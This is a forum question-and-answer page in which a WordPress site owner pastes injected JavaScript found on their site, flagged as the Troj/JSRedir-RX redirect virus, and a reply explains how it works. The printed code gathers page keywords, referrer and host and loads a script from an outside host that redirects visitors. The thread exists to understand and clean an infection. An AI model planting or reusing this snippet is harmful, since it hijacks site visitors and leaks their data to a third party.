Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
Y
Y
Yermek2016-06-23 07:19:18
JavaScript
Yermek, 2016-06-23 07:19:18

What does this virus do?

Good day everyone.
After the next WordPress update, Yandex swore at my site for the presence of the Troj/JSRedir-RX
virus. Armed with the built-in editor and Chrom, I found the following code on my page (I added the checkOne function myself to make it easier to read)
Well, the subject itself.

function checkOne()
{
  var keywords='';
  var metas=document.getElementsByTagName('meta');
  if(metas)
  {
    for(var x=0,y=metas.length;x<y;x++)
    {
      if(metas[x].name.toLowerCase()=="keywords")
      {
        keywords+=metas[x].content;
        }
    }
  }
  return keywords!==''?keywords:null;
}

  var a='';
  setTimeout(10);
  if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0
    ||document.referrer!==undefined||document.referrer!==''
    ||document.referrer!==null){
      document.write('<script type="text/javascript" 
          src="http://ktm-pohlenz.de/js/jquery.min.php?c_utt=J18171&c_utm='
          +encodeURIComponent('http://ktm-pohlenz.de/js/jquery.min.php'+'?'
          +'default_keyword='
          +encodeURIComponent(
            (
              (k=checkOne())==null?(
                v=window.location.search.match(/utm_term=([^&]+)/))==null?
                  (t=document.title)==null?'':t
                :v[1]
              :k))
              +'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

1 answer(s)
Report
C
Cat Anton, 2016-06-23
@ermek6

1. The function checkOne()gets the keywords from the tag <meta name="keywords" content="..." />
2. If the keywords are not found, then the script takes the keywords from utm_term.
3. If key phrases from utm_term are not found, then the title of the page is used.
The found keywords are encoded and sent to ktm-pohlenz.de/js/jquery.min.php. As a result, JavaScript is inserted that redirects the user to the URL that best matches the found keywords and the page's HTTP referer. Example for this page:
PS: The redirect is not always returned. Perhaps there is some kind of filtering on the side of ktm-pohlenz.de by IP, UA, c_utt parameter, etc.

Similar questions
L
lb-web2017-10-16 23:17:13
How to output related mysql values? 3Reply
D
Danil Razumkov2017-10-18 20:30:16
How to make a person see all ads? 2Reply
M
margon802017-10-27 12:52:50
How to implement negate redirect in nginx? 3Reply
M
Maxim Voronkov2017-10-31 11:31:31
How to remove sort field in drupal 7? 3Reply
D
Dmitry Timoshkin2017-10-31 19:34:38
How and where to upload ready-made pages in 1s Bitrix: site management? 3Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question